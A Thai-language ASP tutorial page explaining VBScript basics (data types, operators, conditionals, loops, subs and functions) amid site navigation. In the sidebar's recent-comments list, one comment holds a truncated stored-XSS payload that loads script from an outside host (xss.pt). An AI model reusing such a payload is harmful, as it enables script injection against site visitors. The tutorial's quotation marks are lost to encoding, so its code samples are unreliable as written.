หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 ASP Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 ASP
 
 

การใช้งาน VBScript

 

โครงสร้างของ VBScript

เราอาจจะสงสัยว่า VBScript กับ VB (Visual Basic) แตกต่างกันอย่างไร ที่จริงแล้ว VBScript ก็คือ VB นั้นเองเพียงแต่เป็นบางส่วน หรือซับเซตที่อยู่ภายใน VB เท่านั้น ดังนั้นโครงสร้างการเขียนจึงไม่แตกต่างจาก VB เท่าไหร่นัก ทำให้ผู้มีพื้นฐานการเขียนโปรแกรมด้วย VB มาก่อนสามารถทำความเข้าใจกับ VBScript ได้ไม่ยาก

 

ชนิดของตัวแปร

ใน VBScript จะสนับสนุนตัวแปรเพียงชนิดเดียวคือ Variant ซึ่งเป็นตัวแปรที่สามารถแสดงได้ทั้งข้อมูลตัวเลขและตัวอักษร โดยข้อมูลต่างๆ ที่สามารถเก็บในตัวแปร Variant มีดังนี้

ชนิดของข้อมูล

ความหมาย

Empty

ข้อมูลชนิดว่างคือเป็นค่า 0 สำหรับข้อมูลตัวเลขและค่า zero-length string (??) สำหรับ string

Null

เป็นข้อมูลที่ถือว่าไม่มีค่าใดๆ

Boolean

เป็นข้อมูลทางตรรกะ คือ True หรือ False

Byte

ข้อมูลจำนวนเต็ม ( 8 bit)

Integer

ข้อมูลจำนวนเต็ม ( 16 bit)

Long

ข้อมูลจำนวนเต็ม (32 bit)

Double

ข้อมูลเลขทศนิยม

Date(time)

ใช้เก็บวันที่ตั้งแต่ 1 มกราคม ค.ศ. 100 ถึง 31 ธันวาคม 9999

String

สตริงใช้เก็บตัวอักษรได้ถึงสองล้านตัวอักษร

Object

เป็นตัวแปร Object

Error

จะเป็นชนิดของข้อมูลที่ใช้ในการอ้างถึงคอนโทรลต่างๆ

 

การประกาศตัวแปร (Variable Declaration)

การประกาศตัวแปร จะเป็นการบอกโปรแกรมว่าเราต้องการนำตัวแปรนี้มาใช้โดยการประกาศตัวแปร เราจะใช้คำสั่งดังรูปแบบต่อไปนี้

Dim <ชื่อตัวแปร>

สำหรับการตั้งชื่อตัวแปร เราต้องตั้งชื่อตามกฎต่อไปนี้

-ชื่อตัวแปรต้องไม่ซ้ำกันในโปรแกรมเดียวกัน

-ชื่อตัวแปรต้องไม่ซ้ำกับคีย์เวิร์ด (คำสงวน) ของ VBScript เช่น คำว่า Dim, Integer เป็นต้น

-ความยาวต้องไม่เกิน 255 ตัวอักษร

-จะต้องเริ่มต้นด้วยตัวอักษร A-Z หรือ a-z

 

ตัวอย่างการประกาศตัวแปร

Dim Name, LastName

จากตัวอย่างเป็นการสร้างตัวแปร 2 ตัว ชื่อ Name และ LastName เป็นชนิด Variant

ชนิดของการประกาศตัวแปร

การประกาศตัวแปรใน VBScript จะมีอยู่ 2 แบบคือ

1. การประกาศตัวแปรโดยไม่ใช้คำสั่ง Dim เช่น

Name=?TELECOM INFO?

Num=1234567890

จากตัวอย่าง การประกาศตัวแปรจะไม่ใช้คำสั่ง Dim แต่จะใช้การกำหนดค่าให้กับตัวแปรแทน ซึ่งถ้าตัวแปรที่ถูกกำหนดค่ายังไม่ถูกประกาศคำสั่งนี้ก็จะทำการประกาศและกำหนดค่าตัวแปรให้ด้วย

2. การประกาศตัวแปรโดยใช้คำสั่ง Dim เหมือนกับตัวอย่างแรกที่กล่าวในตอนต้น

 

การใช้โอเปอเรเตอร์

โอเปอเรเตอร์นั้นเป็นการกระทำบางอย่างกับข้อมูลและได้ผลลัพธ์ออกมา สำหรับ

โอเปอเรเตอร์ของ VB Script สามารถแบ่งออกเป็นประเภทใหญ่ๆได้ดังต่อไปนี้

 

โอเปอเรเตอร์ในการคำนวณทางคณิตศาสตร์

โอเปอเรเตอร์ที่เกี่ยวข้องกับการคำนวณทางคณิตศาสตร์ เช่น การบวก การลบ การคูณ เป็นต้น มีดังตารางต่อไปนี้

การกระทำ

สัญลักษณ์

ตัวอย่าง

ผลลัพธ์

การบวก

+

2+4

6

การลบ

-

4-2

2

การคูณ

*

4*2

8

การหาร

/

5/2

2.5

การหารแบบจำนวนเต็ม

\

5 \ 3

1

การหารเศษ

Mod

10 Mod 3

1

การยกกำลัง

^

2^4

16

 

โอเปอเรเตอร์ทางตรรกะ

โอเปอเรเตอร์ทางตรรกะจะให้ผลลัพธ์เป็นค่า True และ False ซึ่งจะกล่าวถึงรายละเอียด และตารางแสดงผลทางตรรกะในกรณีต่างๆดังต่อไปนี้

-โอเปอเรเตอร์ And ถ้าทุกนิพจน์ที่มา And กันมีค่าเป็น True ทุกนิพจน์ผลลัพธ์ที่ได้จะมีค่าเป็น True

A

B

A and B

True

True

True

True

False

False

False

True

False

False

False

False

 

-โอเปอเรเตอร์ or ถ้าทุกนิพจน์ที่มา or กันมีค่าเป็น True เพียงนิพจน์เดียว

A

B

A or B

True

True

True

True

False

True

False

True

True

False

False

False

-โอเปอเรเตอร์ Not จะเป็นการเปลี่ยนค่านิพจน์ดังกล่าวเป็นค่าตรงกันข้าม โอเปอเรเตอร์นี้จะมีผลลัพธ์ดังตารางต่อไปนี้

A

Not A

True

False

False

True

 

โอเปอเรเตอร์ในการทำงานเกี่ยวกับข้อมูลชนิด String

โอเปอเรเตอร์กลุ่มนี้จะเป็นโอเปอเรเตอร์ที่ใช้เชื่อม String กับ String เข้าด้วยกัน หรือ String

เข้ากับข้อมูลตัวเลข ซึ่งมีดังต่อไปนี้

+ ใช้เชื่อม String กับ String & ใช้เชื่อม Sting กับข้อมูลแบบ Numeric หรือ String ก็ได้

 

โอเปอเรเตอร์ในการเปรียบเทียบ

โอเปอเรเตอร์ประเภทนี้จะใช้สำหรับเปรียบเทียบระหว่างค่า 2 ค่า โดยมีผลลัพธ์เป็น True หรือ False อย่างใดอย่างหนึ่งเท่านั้น โดยมีรายละเอียดดังตาราง

สัญลักษณ์ของโอเปอเรเตอร์ ความหมาย รูปแบบการใช้งาน

=

เท่ากับ

A=B

<>

ไม่เท่ากับ

A<>B

<

น้อยกว่า

A<B

>

มากกว่า

A>B

<=

น้อยกว่าหรือเท่ากับ

A<=B

>=

มากกว่าหรือเท่ากับ

A>=B

 

คำสั่งที่ใช้ในการควบคุมการทำงาน

จากการที่เราได้สร้างโปรแกรมกันมาบ้างแล้ว จะเห็นว่าโปรแกรมทำงานจากบนลงล่างและจากซ้ายไปขวาตามลำดับ แต่ในบางครั้ง เราต้องการให้โปรแกรมสามารถเลือกทำงานตามเงื่อนไขของตัวแปรได้ด้วยซึ่งใน VBScript ได้เตรียมคำสั่งที่ใช้ตรวจสอบการทำงานตามเงื่อนไขที่ต้องการไว้แล้ว

คำสั่งในการควบคุมสามารถแบ่งได้ 2 ประเภทหลักดังนี้

  • คำสั่งที่ใช้ในการตัดสินใจ (Decision Structures)
  • คำสั่งในการทำซ้ำ (Loop Structures)

 

คำสั่งที่ใช้ในการตัดสินใจ

ในกรณีที่เราจำเป็นต้องตัดสินใจเลือกสิ่งใดสิ่งหนึ่ง เราจะใช้คำสั่งเงื่อนไข (Condition) ในการตัดสินใจ โดยคำสั่งประเภทนี้จะแบ่งออกได้เป็น 2 คำสั่ง คือ คำสั่ง If-then-Else และ คำสั่ง Select-Case

- คำสั่ง If-Then-Else

เป็นคำสั่งที่มีรูปแบบดังนี้

If<นิพจน์ที่เป็น Boolean> then

?คำสั่งสำหรับนิพจน์ที่มีค่าเป็น True

else

?คำสั่งสำหรับนิพจน์ที่มีค่าเป็น False

end If

 

ตัวอย่าง

if price>20 then

response.write(?Too expensive?)

else

response.write(?Price is OK?)

end If

 

-คำสั่ง Select-Case

เป็นคำสั่งใช้ในการเลือกเส้นทางการทำงานของโปรแกรมจากค่าของนิพจน์ที่กำหนดเป็นคำสั่งที่มีรูปแบบต่อไปนี้

Select Case <นิพจน์>

Case<ค่าของนิพจน์กลุ่มแรก>

?คำสั่งที่ทำงานเมื่อค่านิพจน์ตรงกับค่าในกลุ่มแรก

Case<ค่าของนิพจน์กลุ่มที่ 2>

?คำสั่งที่ทำงานเมื่อค่านิพจน์ตรงกับค่าในกลุ่ม 2

Case Else

?คำสั่งเมื่อไม่ตรงกับกรณีไหนเลย

End Select

 

ตัวอย่าง

Name=-1

Select Case Number

Case 1,2,3

Response.Write(?Between 1 And 3?)

Case 4,5,6,7,8

Response.Write(?Between 4 And 8?)

Case Number>8

Response.Write(?Greather than 8?)

Case Else

Response.Write(?Not positive number?)

End Select

 

คำสั่งที่ใช้ในการทำงานซ้ำ

เราสามารถใช้คำสั่งที่จะกล่าวถึงในหัวข้อนี้ ในการทำงานซ้ำเป็นจำนวนครั้งที่แน่นอน หรือจนกว่าจะทำให้เงื่อนไขเป็นดังที่เราต้องการได้ คำสั่งที่จะกล่าวถึงมี 2 คำสั่ง คือ

  1. คำสั่ง For-Next
  2. คำสั่ง Do-Loop

คำสั่ง For-Next

คำสั่งนี้จะใช้ในการทำงานซ้ำเป็นจำนวนครั้งที่แน่นอน โดยมีรูปแบบดังนี้

For<ชื่อตัวแปร>=<ค่าเริ่มต้น>To<ค่าสุดท้าย> [step]<ค่าที่เพิ่มขึ้นของตัวแปร>1

?ชุดคำสั่ง

Next

 

ตัวอย่าง

Dim I

For I=0 to 10 step 2

Response.Write(I)

Next

 

คำสั่ง Do-Loop

เป็นคำสั่งที่ใช้ในการทำซ้ำ โดยจำนวนครั้งในการซ้ำขึ้นอยู่กับเงื่อนไขหลังคำว่า while หรือ until รูปแบบของคำสั่งจะเป็นดังนี้

Do While<condition>

?ชุดคำสั่ง

Loop

 

Do

?ชุดคำสั่ง

Loop While<condition>

Do Until<condition>

?ชุดคำสั่ง

Loop

ตัวอย่าง

Dim I

Do While I<10

Response.write(I)
I=I+1

Loop

Dim I

Do

Response.write(I)
I=I+1

Loop While I<10

 

การเรียกใช้ Sub และ Function

ความสามารถในการโปรแกรมอย่างหนึ่งคือ ความสามารถในกรเรียกใช้โปรแกรมย่อยซึ่งจะอำนวยความสะดวกในแง่ที่เราไม่ได้เขียนคำสั่งซ้ำอีก เมื่อต้องการทำงานอย่างเดียวกัน โดยเราเพียงแต่สร้างชุดโปรแกรมย่อยขึ้นมาแล้วเรียกใช้เมื่อเราต้องการ

โปรแกรมย่อยสำหรับ VB Script แบ่งได้เป็น 2 ประเภท

    1. sub (หรือ Sub Routine)
    2. Function

 

Sub (หรือ Sub Routine)

เป็นโปรแกรมย่อยที่เมื่อทำงานจบจะไม่มีทางส่งค่าคืนกลับให้ผู้เรียกใช้ทราบ ซึ่งเราสามารถ

เรียกใช้โดยการระบุชื่อ Sub Routine นั้น หรือใช้คำสั่ง Call แล้วตามด้วยชื่อ Sub Routine

Sub <ชื่อของ Sub Routine> (พารามิเตอร์ของ Subroutine,?)

?VBScript Statement

End Sub

Function

เป็นโปรแกรมย่อยที่เมื่อทำงานจบจะส่งค่าคืนกลับมาให้กับผู้ที่เรียกใช้ทราบ เพราะฉะนั้นในการเรียกใช้ Function เราจึงมักจะใช้กำหนดตัวแปรขึ้นมาเพื่อเก็บผลการทำงานของ Function เอาไว้เพื่อส่งมายังผู้ที่เรียกใช้ Function

Function <ชื่อของ Function> (พารามิเตอร์ของ Function)

?VBScript Statement

<ชื่อฟังก์ชั่น>=<คำที่คืนกลับหลังจากเรียก Function>

End Function

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th